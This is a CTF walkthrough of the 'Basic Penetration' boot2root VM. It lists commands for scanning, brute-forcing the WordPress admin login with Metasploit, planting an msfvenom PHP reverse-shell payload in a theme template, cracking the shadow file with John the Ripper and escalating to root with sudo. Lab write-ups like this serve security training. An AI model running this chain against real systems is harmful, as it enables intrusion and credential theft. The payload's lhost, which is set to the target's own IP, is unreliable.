Hello friends! Today we are going to take another CTF challenge known as Basic Penetration. The credit for making this vm machine goes to “ Josiah Pierce” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.
Let’s Breach!!!
Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.13 but you will have to find your own)
netdiscover
nmap -sT 192.168.1.13
Nmap scan shows us port 80 is open, so we open ip address in our browser.
We don’t find anything on the webpage we use nikto to find more information.
nikto -h http://192.168.1.13
We try to open the admin page but it wouldn’t open. When we look at the address bar of the browser. We find that we need to open the admin page using domain name.
Now we add ‘vtcsec’ to hosts file, the hosts file is in /etc/ folder. We add the ip-address of the VM and the domain name.
Now when we open the admin page we can access it. We find that the username is admin. We now brute force the password using this username.
msf > use auxiliary/scanner/http/wordpress_login_enum
msf auxiliary(wordpress_login_enum) > set username admin
msf auxiliary(wordpress_login_enum) > set pass_file /usr/share/wordlists/dirb/common.txt
msf auxiliary(wordpress_login_enum) > set targeturi /secret/
msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.13
msf auxiliary(wordpress_login_enum) > run
We find that the password to the admin panel is “admin”. Now we use username and password as ‘admin’ to access the admin panel. After getting the admin panel we move to 404-template in themes. We change the source code of 404-template with our metasploit shell.
Now we create php shell using msfvenom to replace the 404-template.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.13 lport=4444 -f raw
Now we copy the php code from
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.13
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
As soon as we execute the code we get reverse shell.
After getting the reverse shell we find that we can access both shadow and passwd file. So we download both of them into our system
Now we use unshadow (a utility of john the ripper) to mix merge passwd and shadow file into one file.
unshadow passwd shadow > cracked
john cracked
We find the password to be ‘marlinspike’ for user ‘marlinspike’
Now we login as marlinspike.
su - marlinspike
We check the sudoers list and find that we have all the access same as root so we now spawn bash as root.
sudo -l
sudo bash
Now we are a root user.
